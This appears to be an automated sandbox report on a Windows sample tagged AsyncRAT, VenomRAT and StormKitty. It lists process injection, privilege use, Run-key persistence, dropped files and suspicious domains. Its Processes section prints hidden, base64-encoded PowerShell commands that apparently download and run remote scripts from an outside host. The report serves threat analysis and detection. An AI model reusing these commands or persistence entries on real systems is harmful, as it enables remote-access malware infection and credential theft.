Malware Analysis Report

2024-12-08 02:25

Sample ID 241117-stzy6asgme
Target fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
SHA256 fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
Tags
asyncrat stormkitty venomrat discovery execution persistence rat stealer
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c

Threat Level: Known bad

The file fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c was found to be: Known bad.

Malicious Activity Summary

asyncrat stormkitty venomrat discovery execution persistence rat stealer

Venomrat family

VenomRAT

AsyncRat

Asyncrat family

StormKitty

Stormkitty family

StormKitty payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 15:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 15:25

Reported

2024-11-17 15:28

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A

Venomrat family

venomrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe N/A
N/A N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe N/A

Adds Run key to start application

persistence
Description: Set value (str)
Indicator: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
Process: C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe
Target: N/A

Description: Set value (str)
Indicator: \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Edgeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Edgeservices\" \"C:\\Users\\Public\\Downloads\\Edgeservices\\Edgeservices.exe\""
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

Description: Set value (str)
Indicator: \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Chromeservices\" \"C:\\Users\\Public\\Downloads\\Chromeservices\\Chromeservices.exe\""
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Target: N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 34 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 35 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 36 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 34 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 35 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: 36 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4116 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4116 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4520 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4520 wrote to memory of 1088 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
PID 1088 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1324 wrote to memory of 2480 N/A C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 4116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe C:\Windows\SYSTEM32\cmd.exe
PID 1776 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4356 wrote to memory of 380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
PID 4356 wrote to memory of 380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 380 wrote to memory of 1640 N/A C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe

"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c sora.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=

C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe

"C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c sorast.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2480 -ip 2480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1316

C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe

"C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 openaisoralab.com udp
US 172.67.205.71:443 openaisoralab.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.205.67.172.in-addr.arpa udp
US 172.67.205.71:443 openaisoralab.com tcp
US 8.8.8.8:53 jobdigitalmarketing.xyz udp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 bored-light.sbs udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat

MD5 345718527c30710326719967e3fd4d50
SHA1 8f7be9c69a4e95155dd33c935f362155d91c05dc
SHA256 ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5
SHA512 21bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6

memory/1088-5-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vusuap0l.q1s.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1088-11-0x000001B9F4690000-0x000001B9F46B2000-memory.dmp

memory/1088-16-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

memory/1088-17-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

memory/1088-18-0x000001B9F6F60000-0x000001B9F7122000-memory.dmp

memory/1088-48-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp

memory/1088-49-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe

MD5 25ab75a586f4b22ebae81e74b20bfee9
SHA1 97f52704adbbd42f1c6415f565241ba1521c450f
SHA256 14a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a
SHA512 cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c

C:\Users\Public\Downloads\Edgeservices\MSVCP140.dll

MD5 29c6c243cfb1cec96b4a1008274f9600
SHA1 c54b10ef6305cc3814c68e6c8fd6daecbb27622a
SHA256 44a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04
SHA512 39c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee

C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll

MD5 02794a29811ba0a78e9687a0010c37ce
SHA1 97b5701d18bd5e25537851614099e2ffce25d6d8
SHA256 1729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f
SHA512 caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272

C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll

MD5 d63a867c0a14584dfe04a9712c64bc0b
SHA1 3dc1c8e9ca93962a6d3400be3ac7d76d65f87a01
SHA256 60dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0
SHA512 aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914

C:\Users\Public\Downloads\Edgeservices\vcruntime140_1.dll

MD5 d8d1a08176ba2542c58669c1c04da1b7
SHA1 e0d0059baf23fb5e1d2dadedc12e2f53c930256d
SHA256 26c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d
SHA512 5308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb

C:\Users\Public\Downloads\Edgeservices\concrt140e.dll

MD5 22c3fc378a3c3311bb5e9082c443fbd4
SHA1 06c32b31de4772da425c1eebc6c8064ed4305843
SHA256 422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9
SHA512 4330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b

memory/2480-69-0x0000000000400000-0x000000000064A000-memory.dmp

memory/1088-70-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat

MD5 d80437fda6ba90dd8338ca91fbcc18dc
SHA1 87415b5650b55ff7b2a38684768a49018e42d982
SHA256 81d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a
SHA512 2ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240

memory/2480-72-0x00000000059B0000-0x0000000005F54000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56c43715e0e7fa58012d8a5769d8d568
SHA1 4370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA256 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512 b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9a929a0092fad42a2ddadab08c92cb6
SHA1 4075acd066c1ee6535d2795c1cb2ff105b202760
SHA256 796bb53fc5db0118d175df6f018ff87642b70c0ea7812e3286ae556d0c68821e
SHA512 6b4c1af8b28ede7617a6ae357c4590249a61979baf9e27b4564d2c4c44fd36a163a7c2840e214523b1b9638d10a1257e751c0f95d9520e9dd90a9bc4f91115a8

memory/2480-85-0x0000000005330000-0x0000000005396000-memory.dmp

C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll

MD5 0897cd584a6a8e39b9f2e25a2ab193e2
SHA1 4af09f0291c659d74e4e7f1a7e96632b3987daef
SHA256 8c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65
SHA512 bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427

C:\Users\Public\Downloads\Chromeservices\concrt140e.dll

MD5 8b0e3a4d5c72ddee5866296bcb2c8185
SHA1 d689fbf9c6fcf957243e0c3f89831cecf69eade3
SHA256 2d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b
SHA512 ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198

memory/1640-132-0x0000000000400000-0x0000000000457000-memory.dmp

memory/1640-133-0x0000000000400000-0x0000000000457000-memory.dmp